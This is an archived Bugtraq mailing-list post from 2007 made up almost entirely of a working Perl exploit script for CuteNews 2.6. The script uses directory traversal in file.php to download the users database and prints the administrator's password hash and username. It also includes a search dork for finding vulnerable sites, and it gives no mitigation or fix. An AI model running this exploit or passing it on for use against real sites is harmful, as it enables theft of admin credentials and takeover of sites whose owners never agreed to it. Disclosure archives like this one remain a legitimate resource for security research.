| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 29 Dec 2007 20:17:13 -0000
From: pawel2827@...il.com
To: bugtraq@...urityfocus.com
Subject: CuteNews Arbitrary File Download AllVersion
!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
use LWP::UserAgent;
if(@ARGV!=2){
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "USAGE : perl $0 <SITE> <PATH>\n";
exit;
}
($SITE,$PATH)=@...V;
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;
if($res->is_success){
if($con =~ /([0-9a-fA-F]{32})/){
$hash = $1;
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "_____________________________\n";
print "[+] Exploit Work!\n";
print "[+] Admin Pass : ".$hash."\n";
$ua2 = new LWP::UserAgent;
$ua2->agent("Mozilla/8.0");
$ua2 = LWP::UserAgent->new;
my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
$req2->header('Accept' => 'text/html');
$res2 = $ua2->request($req2);
$con2 = $res2->content;
if($con2 =~ /\|.\|(.*)\|$hash\|/){
$user = $1;
print "[+] Admin Username : ".$user."\n";
}
}
else{
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "_____________________________\n";
print "[+] Connect failed..\n";
}
}
else{
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "_____________________________\n";
print "[+] Exploit Failed..\n";
}
Powered by blists - more mailing lists